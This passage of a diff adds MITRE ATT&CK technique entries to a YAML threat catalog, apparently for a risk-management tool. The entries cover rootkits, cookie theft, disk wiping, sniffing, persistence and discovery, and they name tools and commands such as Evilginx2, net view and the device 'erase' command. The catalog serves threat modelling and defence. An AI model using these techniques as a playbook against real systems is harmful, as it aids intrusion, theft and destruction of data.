+      \ (Citation: Wikipedia Rootkit) Rootkits have been seen for Windows, Linux,\
+      \ and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat\
+      \ Mac OSX Rootkit)\nhttps://attack.mitre.org/techniques/T1014"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1123
+    name: T1123 - Audio Capture
+    provider: MITRE ATT&CK
+    description: 'An adversary can leverage a computer''s peripheral devices (e.g.,
+      microphones and webcams) or applications (e.g., voice and video call services)
+      to capture audio recordings for the purpose of listening into sensitive conversations
+      to gather information.
+
+
+      Malware or scripts may be used to interact with the devices through an available
+      API provided by the operating system or an application to capture audio. Audio
+      files may be written to disk and exfiltrated later.
+
+      https://attack.mitre.org/techniques/T1123'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1543
+    name: T1543 - Create or Modify System Process
+    provider: MITRE ATT&CK
+    description: "Adversaries may create or modify system-level processes to repeatedly\
+      \ execute malicious payloads as part of persistence. When operating systems\
+      \ boot up, they can start processes that perform background system functions.\
+      \ On Windows and Linux, these system processes are referred to as services.(Citation:\
+      \ TechNet Services) On macOS, launchd processes known as [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)\
+      \ and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) are run\
+      \ to finish system initialization and load user specific parameters.(Citation:\
+      \ AppleDocs Launch Agent Daemons) \n\nAdversaries may install new services,\
+      \ daemons, or agents that can be configured to execute at startup or a repeatable\
+      \ interval in order to establish persistence. Similarly, adversaries may modify\
+      \ existing services, daemons, or agents to achieve the same effect.  \n\nServices,\
+      \ daemons, or agents may be created with administrator privileges but executed\
+      \ under root/SYSTEM privileges. Adversaries may leverage this functionality\
+      \ to create or modify system processes in order to escalate privileges.(Citation:\
+      \ OSX Malware Detection)\nhttps://attack.mitre.org/techniques/T1543"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1133
+    name: T1133 - External Remote Services
+    provider: MITRE ATT&CK
+    description: "Adversaries may leverage external-facing remote services to initially\
+      \ access and/or persist within a network. Remote services such as VPNs, Citrix,\
+      \ and other access mechanisms allow users to connect to internal enterprise\
+      \ network resources from external locations. There are often remote service\
+      \ gateways that manage connections and credential authentication for these services.\
+      \ Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006)\
+      \ and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used\
+      \ externally.(Citation: MacOS VNC software for Remote Desktop)\n\nAccess to\
+      \ [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use the service\
+      \ is often a requirement, which could be obtained through credential pharming\
+      \ or by obtaining the credentials from users after compromising the enterprise\
+      \ network.(Citation: Volexity Virtual Private Keylogging) Access to remote services\
+      \ may be used as a redundant or persistent access mechanism during an operation.\n\
+      \nAccess may also be gained through an exposed service that doesn\u2019t require\
+      \ authentication. In containerized environments, this may include an exposed\
+      \ Docker API, Kubernetes API server, kubelet, or web application such as the\
+      \ Kubernetes dashboard.(Citation: Trend Micro Exposed Docker Server)(Citation:\
+      \ Unit 42 Hildegard Malware)\nhttps://attack.mitre.org/techniques/T1133"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1539
+    name: T1539 - Steal Web Session Cookie
+    provider: MITRE ATT&CK
+    description: 'An adversary may steal web application or service session cookies
+      and use them to gain access to web applications or Internet services as an authenticated
+      user without needing credentials. Web applications and services often use session
+      cookies as an authentication token after a user has authenticated to a website.
+
+
+      Cookies are often valid for an extended period of time, even if the web application
+      is not actively used. Cookies can be found on disk, in the process memory of
+      the browser, and in network traffic to remote systems. Additionally, other applications
+      on the targets machine might store sensitive authentication cookies in memory
+      (e.g. apps which authenticate to cloud services). Session cookies can be used
+      to bypasses some multi-factor authentication protocols.(Citation: Pass The Cookie)
+
+
+      There are several examples of malware targeting cookies from web browsers on
+      the local system.(Citation: Kaspersky TajMahal April 2019)(Citation: Unit 42
+      Mac Crypto Cookies January 2019) There are also open source frameworks such
+      as `Evilginx2` and `Muraena` that can gather session cookies through a malicious
+      proxy (ex: [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557))
+      that can be set up by an adversary and used in phishing campaigns.(Citation:
+      Github evilginx2)(Citation: GitHub Mauraena)
+
+
+      After an adversary acquires a valid cookie, they can then perform a [Web Session
+      Cookie](https://attack.mitre.org/techniques/T1550/004) technique to login to
+      the corresponding web application.
+
+      https://attack.mitre.org/techniques/T1539'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1578
+    name: T1578 - Modify Cloud Compute Infrastructure
+    provider: MITRE ATT&CK
+    description: 'An adversary may attempt to modify a cloud account''s compute service
+      infrastructure to evade defenses. A modification to the compute service infrastructure
+      can include the creation, deletion, or modification of one or more components
+      such as compute instances, virtual machines, and snapshots.
+
+
+      Permissions gained from the modification of infrastructure components may bypass
+      restrictions that prevent access to existing infrastructure. Modifying infrastructure
+      components may also allow an adversary to evade detection and remove evidence
+      of their presence.(Citation: Mandiant M-Trends 2020)
+
+      https://attack.mitre.org/techniques/T1578'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1069
+    name: T1069 - Permission Groups Discovery
+    provider: MITRE ATT&CK
+    description: 'Adversaries may attempt to discover group and permission settings.
+      This information can help adversaries determine which user accounts and groups
+      are available, the membership of users in particular groups, and which users
+      and groups have elevated permissions.
+
+
+      Adversaries may attempt to discover group permission settings in many different
+      ways. This data may provide the adversary with information about the compromised
+      environment that can be used in follow-on activity and targeting.(Citation:
+      CrowdStrike BloodHound April 2018)
+
+      https://attack.mitre.org/techniques/T1069'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1114
+    name: T1114 - Email Collection
+    provider: MITRE ATT&CK
+    description: 'Adversaries may target user email to collect sensitive information.
+      Emails may contain sensitive data, including trade secrets or personal information,
+      that can prove valuable to adversaries. Adversaries can collect or forward email
+      from mail servers or clients.
+
+      https://attack.mitre.org/techniques/T1114'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1594
+    name: T1594 - Search Victim-Owned Websites
+    provider: MITRE ATT&CK
+    description: 'Adversaries may search websites owned by the victim for information
+      that can be used during targeting. Victim-owned websites may contain a variety
+      of details, including names of departments/divisions, physical locations, and
+      data about key employees such as names, roles, and contact info (ex: [Email
+      Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may
+      also have details highlighting business operations and relationships.(Citation:
+      Comparitech Leak)
+
+
+      Adversaries may search victim-owned websites to gather actionable information.
+      Information from these sources may reveal opportunities for other forms of reconnaissance
+      (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or
+      [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)),
+      establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585)
+      or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or
+      initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)
+      or [Phishing](https://attack.mitre.org/techniques/T1566)).
+
+      https://attack.mitre.org/techniques/T1594'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1561
+    name: T1561 - Disk Wipe
+    provider: MITRE ATT&CK
+    description: 'Adversaries may wipe or corrupt raw disk data on specific systems
+      or in large numbers in a network to interrupt availability to system and network
+      resources. With direct write access to a disk, adversaries may attempt to overwrite
+      portions of disk data. Adversaries may opt to wipe arbitrary portions of disk
+      data and/or wipe disk structures like the master boot record (MBR). A complete
+      wipe of all disk sectors may be attempted.
+
+
+      To maximize impact on the target organization in operations where network-wide
+      availability interruption is the goal, malware used for wiping disks may have
+      worm-like features to propagate across a network by leveraging additional techniques
+      like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential
+      Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin
+      Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster
+      Destructive Malware)
+
+
+      On network devices, adversaries may wipe configuration files and other data
+      from the device using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008)
+      commands such as `erase`.(Citation: erase_cmd_cisco)
+
+      https://attack.mitre.org/techniques/T1561'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1615
+    name: T1615 - Group Policy Discovery
+    provider: MITRE ATT&CK
+    description: 'Adversaries may gather information on Group Policy settings to identify
+      paths for privilege escalation, security measures applied within a domain, and
+      to discover patterns in domain objects that can be manipulated or used to blend
+      in the environment. Group Policy allows for centralized management of user and
+      computer settings in Active Directory (AD). Group policy objects (GPOs) are
+      containers for group policy settings made up of files stored within a predictable
+      network path `\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\`.(Citation: TechNet Group
+      Policy Basics)(Citation: ADSecurity GPO Persistence 2016)
+
+
+      Adversaries may use commands such as <code>gpresult</code> or various publicly
+      available PowerShell functions, such as <code>Get-DomainGPO</code> and <code>Get-DomainGPOLocalGroup</code>,
+      to gather information on Group Policy settings.(Citation: Microsoft gpresult)(Citation:
+      Github PowerShell Empire) Adversaries may use this information to shape follow-on
+      behaviors, including determining potential attack paths within the target network
+      as well as opportunities to manipulate Group Policy settings (i.e. [Domain Policy
+      Modification](https://attack.mitre.org/techniques/T1484)) for their benefit.
+
+      https://attack.mitre.org/techniques/T1615'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1025
+    name: T1025 - Data from Removable Media
+    provider: MITRE ATT&CK
+    description: "Adversaries may search connected removable media on computers they\
+      \ have compromised to find files of interest. Sensitive data can be collected\
+      \ from any removable media (optical disk drive, USB memory, etc.) connected\
+      \ to the compromised system prior to Exfiltration. Interactive command shells\
+      \ may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106)\
+      \ may be used to gather information. \n\nSome adversaries may also use [Automated\
+      \ Collection](https://attack.mitre.org/techniques/T1119) on removable media.\n\
+      https://attack.mitre.org/techniques/T1025"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1547
+    name: T1547 - Boot or Logon Autostart Execution
+    provider: MITRE ATT&CK
+    description: 'Adversaries may configure system settings to automatically execute
+      a program during system boot or logon to maintain persistence or gain higher-level
+      privileges on compromised systems. Operating systems may have mechanisms for
+      automatically running a program on system boot or account logon.(Citation: Microsoft
+      Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation:
+      Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These
+      mechanisms may include automatically executing programs that are placed in specially
+      designated directories or are referenced by repositories that store configuration
+      information, such as the Windows Registry. An adversary may achieve the same
+      goal by modifying or extending features of the kernel.
+
+
+      Since some boot or logon autostart programs run with higher privileges, an adversary
+      may leverage these to elevate privileges.
+
+      https://attack.mitre.org/techniques/T1547'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1600
+    name: T1600 - Weaken Encryption
+    provider: MITRE ATT&CK
+    description: "Adversaries may compromise a network device\u2019s encryption capability\
+      \ in order to bypass encryption that would otherwise protect data communications.\
+      \ (Citation: Cisco Synful Knock Evolution)\n\nEncryption can be used to protect\
+      \ transmitted network traffic to maintain its confidentiality (protect against\
+      \ unauthorized disclosure) and integrity (protect against unauthorized changes).\
+      \ Encryption ciphers are used to convert a plaintext message to ciphertext and\
+      \ can be computationally intensive to decipher without the associated decryption\
+      \ key. Typically, longer keys increase the cost of cryptanalysis, or decryption\
+      \ without the key.\n\nAdversaries can compromise and manipulate devices that\
+      \ perform encryption of network traffic. For example, through behaviors such\
+      \ as [Modify System Image](https://attack.mitre.org/techniques/T1601), [Reduce\
+      \ Key Space](https://attack.mitre.org/techniques/T1600/001), and [Disable Crypto\
+      \ Hardware](https://attack.mitre.org/techniques/T1600/002), an adversary can\
+      \ negatively effect and/or eliminate a device\u2019s ability to securely encrypt\
+      \ network traffic. This poses a greater risk of unauthorized disclosure and\
+      \ may help facilitate data manipulation, Credential Access, or Collection efforts.\
+      \ (Citation: Cisco Blog Legacy Device Attacks)\nhttps://attack.mitre.org/techniques/T1600"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1489
+    name: T1489 - Service Stop
+    provider: MITRE ATT&CK
+    description: "Adversaries may stop or disable services on a system to render those\
+      \ services unavailable to legitimate users. Stopping critical services or processes\
+      \ can inhibit or stop response to an incident or aid in the adversary's overall\
+      \ objectives to cause damage to the environment.(Citation: Talos Olympic Destroyer\
+      \ 2018)(Citation: Novetta Blockbuster) \n\nAdversaries may accomplish this by\
+      \ disabling individual services of high importance to an organization, such\
+      \ as <code>MSExchangeIS</code>, which will make Exchange content inaccessible\
+      \ (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable\
+      \ many or all services to render systems unusable.(Citation: Talos Olympic Destroyer\
+      \ 2018) Services or processes may not allow for modification of their data stores\
+      \ while running. Adversaries may stop services or processes in order to conduct\
+      \ [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted\
+      \ for Impact](https://attack.mitre.org/techniques/T1486) on the data stores\
+      \ of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)\n\
+      https://attack.mitre.org/techniques/T1489"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1652
+    name: T1652 - Device Driver Discovery
+    provider: MITRE ATT&CK
+    description: 'Adversaries may attempt to enumerate local device drivers on a victim
+      host. Information about device drivers may highlight various insights that shape
+      follow-on behaviors, such as the function/purpose of the host, present security
+      tools (i.e. [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001))
+      or other defenses (e.g., [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)),
+      as well as potential exploitable vulnerabilities (e.g., [Exploitation for Privilege
+      Escalation](https://attack.mitre.org/techniques/T1068)).
+
+
+      Many OS utilities may provide information about local device drivers, such as
+      `driverquery.exe` and the `EnumDeviceDrivers()` API function on Windows.(Citation:
+      Microsoft Driverquery)(Citation: Microsoft EnumDeviceDrivers) Information about
+      device drivers (as well as associated services, i.e., [System Service Discovery](https://attack.mitre.org/techniques/T1007))
+      may also be available in the Registry.(Citation: Microsoft Registry Drivers)
+
+
+      On Linux/macOS, device drivers (in the form of kernel modules) may be visible
+      within `/dev` or using utilities such as `lsmod` and `modinfo`.(Citation: Linux
+      Kernel Programming)(Citation: lsmod man)(Citation: modinfo man)
+
+      https://attack.mitre.org/techniques/T1652'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1564
+    name: T1564 - Hide Artifacts
+    provider: MITRE ATT&CK
+    description: 'Adversaries may attempt to hide artifacts associated with their
+      behaviors to evade detection. Operating systems may have features to hide various
+      artifacts, such as important system files and administrative task execution,
+      to avoid disrupting user work environments and prevent users from changing files
+      or features on the system. Adversaries may abuse these features to hide artifacts
+      such as files, directories, user accounts, or other system activity to evade
+      detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation:
+      MalwareBytes ADS July 2015)
+
+
+      Adversaries may also attempt to hide artifacts associated with malicious behavior
+      by creating computing regions that are isolated from common security instrumentation,
+      such as through the use of virtualization technology.(Citation: Sophos Ragnar
+      May 2020)
+
+      https://attack.mitre.org/techniques/T1564'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1080
+    name: T1080 - Taint Shared Content
+    provider: MITRE ATT&CK
+    description: 'Adversaries may deliver payloads to remote systems by adding content
+      to shared storage locations, such as network drives or internal code repositories.
+      Content stored on network drives or in other shared locations may be tainted
+      by adding malicious programs, scripts, or exploit code to otherwise valid files.
+      Once a user opens the shared tainted content, the malicious portion can be executed
+      to run the adversary''s code on a remote system. Adversaries may use tainted
+      shared content to move laterally.
+
+
+      A directory share pivot is a variation on this technique that uses several other
+      techniques to propagate malware when users access a shared network directory.
+      It uses [Shortcut Modification](https://attack.mitre.org/techniques/T1547/009)
+      of directory .LNK files that use [Masquerading](https://attack.mitre.org/techniques/T1036)
+      to look like the real directories, which are hidden through [Hidden Files and
+      Directories](https://attack.mitre.org/techniques/T1564/001). The malicious .LNK-based
+      directories have an embedded command that executes the hidden malware file in
+      the directory and then opens the real intended directory so that the user''s
+      expected action still occurs. When used with frequently used network directories,
+      the technique may result in frequent reinfections and broad access to systems
+      and potentially to new and higher privileged accounts. (Citation: Retwin Directory
+      Share Pivot)
+
+
+      Adversaries may also compromise shared network directories through binary infections
+      by appending or prepending its code to the healthy binary on the shared network
+      directory. The malware may modify the original entry point (OEP) of the healthy
+      binary to ensure that it is executed before the legitimate code. The infection
+      could continue to spread via the newly infected file when it is executed by
+      a remote system. These infections may target both binary and non-binary formats
+      that end with extensions including, but not limited to, .EXE, .DLL, .SCR, .BAT,
+      and/or .VBS.
+
+      https://attack.mitre.org/techniques/T1080'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1137
+    name: T1137 - Office Application Startup
+    provider: MITRE ATT&CK
+    description: 'Adversaries may leverage Microsoft Office-based applications for
+      persistence between startups. Microsoft Office is a fairly common application
+      suite on Windows-based operating systems within an enterprise network. There
+      are multiple mechanisms that can be used with Office for persistence when an
+      Office-based application is started; this can include the use of Office Template
+      Macros and add-ins.
+
+
+      A variety of features have been discovered in Outlook that can be abused to
+      obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost
+      Ruler GitHub) These persistence mechanisms can work within Outlook or be used
+      through Office 365.(Citation: TechNet O365 Outlook Rules)
+
+      https://attack.mitre.org/techniques/T1137'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1119
+    name: T1119 - Automated Collection
+    provider: MITRE ATT&CK
+    description: "Once established within a system or network, an adversary may use\
+      \ automated techniques for collecting internal data. Methods for performing\
+      \ this technique could include use of a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)\
+      \ to search for and copy information fitting set criteria such as file type,\
+      \ location, or name at specific time intervals. In cloud-based environments,\
+      \ adversaries may also use cloud APIs, command line interfaces, or extract,\
+      \ transform, and load (ETL) services to automatically collect data. This functionality\
+      \ could also be built into remote access tools. \n\nThis technique may incorporate\
+      \ use of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083)\
+      \ and [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570) to\
+      \ identify and move files, as well as [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538)\
+      \ and [Cloud Storage Object Discovery](https://attack.mitre.org/techniques/T1619)\
+      \ to identify resources in cloud environments.\nhttps://attack.mitre.org/techniques/T1119"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1115
+    name: T1115 - Clipboard Data
+    provider: MITRE ATT&CK
+    description: "Adversaries may collect data stored in the clipboard from users\
+      \ copying information within or between applications. \n\nFor example, on Windows\
+      \ adversaries can access clipboard data by using <code>clip.exe</code> or <code>Get-Clipboard</code>.(Citation:\
+      \ MSDN Clipboard)(Citation: clip_win_server)(Citation: CISA_AA21_200B) Additionally,\
+      \ adversaries may monitor then replace users\u2019 clipboard with their data\
+      \ (e.g., [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002)).(Citation:\
+      \ mining_ruby_reversinglabs)\n\nmacOS and Linux also have commands, such as\
+      \ <code>pbpaste</code>, to grab clipboard contents.(Citation: Operating with\
+      \ EmPyre)\nhttps://attack.mitre.org/techniques/T1115"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1007
+    name: T1007 - System Service Discovery
+    provider: MITRE ATT&CK
+    description: 'Adversaries may try to gather information about registered local
+      system services. Adversaries may obtain information about services using tools
+      as well as OS utility commands such as <code>sc query</code>, <code>tasklist
+      /svc</code>, <code>systemctl --type=service</code>, and <code>net start</code>.
+
+
+      Adversaries may use the information from [System Service Discovery](https://attack.mitre.org/techniques/T1007)
+      during automated discovery to shape follow-on behaviors, including whether or
+      not the adversary fully infects the target and/or attempts specific actions.
+
+      https://attack.mitre.org/techniques/T1007'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1040
+    name: T1040 - Network Sniffing
+    provider: MITRE ATT&CK
+    description: 'Adversaries may sniff network traffic to capture information about
+      an environment, including authentication material passed over the network. Network
+      sniffing refers to using the network interface on a system to monitor or capture
+      information sent over a wired or wireless connection. An adversary may place
+      a network interface into promiscuous mode to passively access data in transit
+      over the network, or use span ports to capture a larger amount of data.
+
+
+      Data captured via this technique may include user credentials, especially those
+      sent over an insecure, unencrypted protocol. Techniques for name service resolution
+      poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001),
+      can also be used to capture credentials to websites, proxies, and internal systems
+      by redirecting traffic to an adversary.
+
+
+      Network sniffing may also reveal configuration details, such as running services,
+      version numbers, and other network characteristics (e.g. IP addresses, hostnames,
+      VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities.
+
+
+      In cloud-based environments, adversaries may still be able to use traffic mirroring
+      services to sniff network traffic from virtual machines. For example, AWS Traffic
+      Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified
+      instances to collect traffic from and specified targets to send collected traffic
+      to.(Citation: AWS Traffic Mirroring)(Citation: GCP Packet Mirroring)(Citation:
+      Azure Virtual Network TAP) Often, much of this traffic will be in cleartext
+      due to the use of TLS termination at the load balancer level to reduce the strain
+      of encrypting and decrypting traffic.(Citation: Rhino Security Labs AWS VPC
+      Traffic Mirroring)(Citation: SpecterOps AWS Traffic Mirroring) The adversary
+      can then use exfiltration techniques such as Transfer Data to Cloud Account
+      in order to access the sniffed traffic.(Citation: Rhino Security Labs AWS VPC
+      Traffic Mirroring)
+
+
+      On network devices, adversaries may perform network captures using [Network
+      Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as
+      `monitor capture`.(Citation: US-CERT-TA18-106A)(Citation: capture_embedded_packet_on_software)
+
+      https://attack.mitre.org/techniques/T1040'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1530
+    name: T1530 - Data from Cloud Storage
+    provider: MITRE ATT&CK
+    description: "Adversaries may access data from cloud storage.\n\nMany IaaS providers\
+      \ offer solutions for online data object storage such as Amazon S3, Azure Storage,\
+      \ and Google Cloud Storage. Similarly, SaaS enterprise platforms such as Office\
+      \ 365 and Google Workspace provide cloud-based document storage to users through\
+      \ services such as OneDrive and Google Drive, while SaaS application providers\
+      \ such as Slack, Confluence, Salesforce, and Dropbox may provide cloud storage\
+      \ solutions as a peripheral or primary use case of their platform. \n\nIn some\
+      \ cases, as with IaaS-based cloud storage, there exists no overarching application\
+      \ (such as SQL or Elasticsearch) with which to interact with the stored objects:\
+      \ instead, data from these solutions is retrieved directly though the [Cloud\
+      \ API](https://attack.mitre.org/techniques/T1059/009). In SaaS applications,\
+      \ adversaries may be able to collect this data directly from APIs or backend\
+      \ cloud storage objects, rather than through their front-end application or\
+      \ interface (i.e., [Data from Information Repositories](https://attack.mitre.org/techniques/T1213)).\
+      \ \n\nAdversaries may collect sensitive data from these cloud storage solutions.\
+      \ Providers typically offer security guides to help end users configure systems,\
+      \ though misconfigurations are a common problem.(Citation: Amazon S3 Security,\
+      \ 2019)(Citation: Microsoft Azure Storage Security, 2019)(Citation: Google Cloud\
+      \ Storage Best Practices, 2019) There have been numerous incidents where cloud\
+      \ storage has been improperly secured, typically by unintentionally allowing\
+      \ public access to unauthenticated users, overly-broad access by all users,\
+      \ or even access for any anonymous person outside the control of the Identity\
+      \ Access Management system without even needing basic user permissions.\n\n\
+      This open access may expose various types of sensitive data, such as credit\
+      \ cards, personally identifiable information, or medical records.(Citation:\
+      \ Trend Micro S3 Exposed PII, 2017)(Citation: Wired Magecart S3 Buckets, 2019)(Citation:\
+      \ HIPAA Journal S3 Breach, 2017)(Citation: Rclone-mega-extortion_05_2021)\n\n\
+      Adversaries may also obtain then abuse leaked credentials from source repositories,\
+      \ logs, or other means as a way to gain access to cloud storage objects.\nhttps://attack.mitre.org/techniques/T1530"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1135
+    name: T1135 - Network Share Discovery
+    provider: MITRE ATT&CK
+    description: "Adversaries may look for folders and drives shared on remote systems\
+      \ as a means of identifying sources of information to gather as a precursor\
+      \ for Collection and to identify potential systems of interest for Lateral Movement.\
+      \ Networks often contain shared network drives and folders that enable users\
+      \ to access file directories on various systems across a network. \n\nFile sharing\
+      \ over a Windows network occurs over the SMB protocol. (Citation: Wikipedia\
+      \ Shared Resource) (Citation: TechNet Shared Folder) [Net](https://attack.mitre.org/software/S0039)\
+      \ can be used to query a remote system for available shared drives using the\
+      \ <code>net view \\\\\\\\remotesystem</code> command. It can also be used to\
+      \ query shared drives on the local system using <code>net share</code>. For\
+      \ macOS, the <code>sharing -l</code> command lists all shared points used for\
+      \ smb services.\nhttps://attack.mitre.org/techniques/T1135"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1120
+    name: T1120 - Peripheral Device Discovery
+    provider: MITRE ATT&CK
+    description: 'Adversaries may attempt to gather information about attached peripheral
+      devices and components connected to a computer system.(Citation: Peripheral
+      Discovery Linux)(Citation: Peripheral Discovery macOS) Peripheral devices could
+      include auxiliary resources that support a variety of functionalities such as
+      keyboards, printers, cameras, smart card readers, or removable storage. The
+      information may be used to enhance their awareness of the system and network
+      environment or may be used for further actions.
+
+      https://attack.mitre.org/techniques/T1120'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1082
+    name: T1082 - System Information Discovery
+    provider: MITRE ATT&CK
+    description: 'An adversary may attempt to get detailed information about the operating
+      system and hardware, including version, patches, hotfixes, service packs, and
+      architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082)
+      during automated discovery to shape follow-on behaviors, including whether or
+      not the adversary fully infects the target and/or attempts specific actions.
+
+
+      Tools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used
+      to gather detailed system information. If running with privileged access, a
+      breakdown of system data can be gathered through the <code>systemsetup</code>
+      configuration tool on macOS. As an example, adversaries with user-level access
+      can execute the <code>df -aH</code> command to obtain currently mounted disks
+      and associated freely available space. Adversaries may also leverage a [Network
+      Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices
+      to gather detailed system information (e.g. <code>show version</code>).(Citation:
+      US-CERT-TA18-106A) [System Information Discovery](https://attack.mitre.org/techniques/T1082)
+      combined with information gathered from other forms of discovery and reconnaissance
+      can drive payload development and concealment.(Citation: OSX.FairyTale)(Citation:
+      20 macOS Common Tools and Techniques)
+
+
+      Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure
+      allow access to instance and virtual machine information via APIs. Successful
+      authenticated API calls can return data such as the operating system platform
+      and status of a particular instance or the model view of a virtual machine.(Citation:
+      Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft
+      Virutal Machine API)
+
+      https://attack.mitre.org/techniques/T1082'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1071
+    name: T1071 - Application Layer Protocol
+    provider: MITRE ATT&CK
+    description: "Adversaries may communicate using OSI application layer protocols\
+      \ to avoid detection/network filtering by blending in with existing traffic.\
+      \ Commands to the remote system, and often the results of those commands, will\
+      \ be embedded within the protocol traffic between the client and server. \n\n\
+      Adversaries may utilize many different protocols, including those used for web\
+      \ browsing, transferring files, electronic mail, or DNS. For connections that\
+      \ occur internally within an enclave (such as those between a proxy or pivot\
+      \ node and other nodes), commonly used protocols are SMB, SSH, or RDP.\nhttps://attack.mitre.org/techniques/T1071"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1053
+    name: T1053 - Scheduled Task/Job
+    provider: MITRE ATT&CK
+    description: 'Adversaries may abuse task scheduling functionality to facilitate
+      initial or recurring execution of malicious code. Utilities exist within all
+      major operating systems to schedule programs or scripts to be executed at a
+      specified date and time. A task can also be scheduled on a remote system, provided
+      the proper authentication is met (ex: RPC and file and printer sharing in Windows
+      environments). Scheduling a task on a remote system typically may require being
+      a member of an admin or otherwise privileged group on the remote system.(Citation:
+      TechNet Task Scheduler Security)
+
+
+      Adversaries may use task scheduling to execute programs at system startup or
+      on a scheduled basis for persistence. These mechanisms can also be abused to
+      run a process under the context of a specified account (such as one with elevated
+      permissions/privileges). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+      adversaries have also abused task scheduling to potentially mask one-time execution
+      under a trusted system process.(Citation: ProofPoint Serpent)
+
+      https://attack.mitre.org/techniques/T1053'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1176
+    name: T1176 - Browser Extensions
+    provider: MITRE ATT&CK
+    description: 'Adversaries may abuse Internet browser extensions to establish persistent
+      access to victim systems. Browser extensions or plugins are small programs that
+      can add functionality and customize aspects of Internet browsers. They can be
+      installed directly or through a browser''s app store and generally have access
+      and permissions to everything that the browser can access.(Citation: Wikipedia
+      Browser Extension)(Citation: Chrome Extensions Definition)
+
+
+      Malicious extensions can be installed into a browser through malicious app store
+      downloads masquerading as legitimate extensions, through social engineering,
+      or by an adversary that has already compromised a system. Security can be limited
+      on browser app stores so it may not be difficult for malicious extensions to
+      defeat automated scanners.(Citation: Malicious Chrome Extension Numbers) Depending
+      on the browser, adversaries may also manipulate an extension''s update url to
+      install updates from an adversary controlled server or manipulate the mobile
+      configuration file to silently install additional extensions.
+
+
+      Previous to macOS 11, adversaries could silently install browser extensions
+      via the command line using the <code>profiles</code> tool to install malicious
+      <code>.mobileconfig</code> files. In macOS 11+, the use of the <code>profiles</code>
+      tool can no longer install configuration profiles, however <code>.mobileconfig</code>
+      files can be planted and installed with user interaction.(Citation: xorrior
+      chrome extensions macOS)
+
+
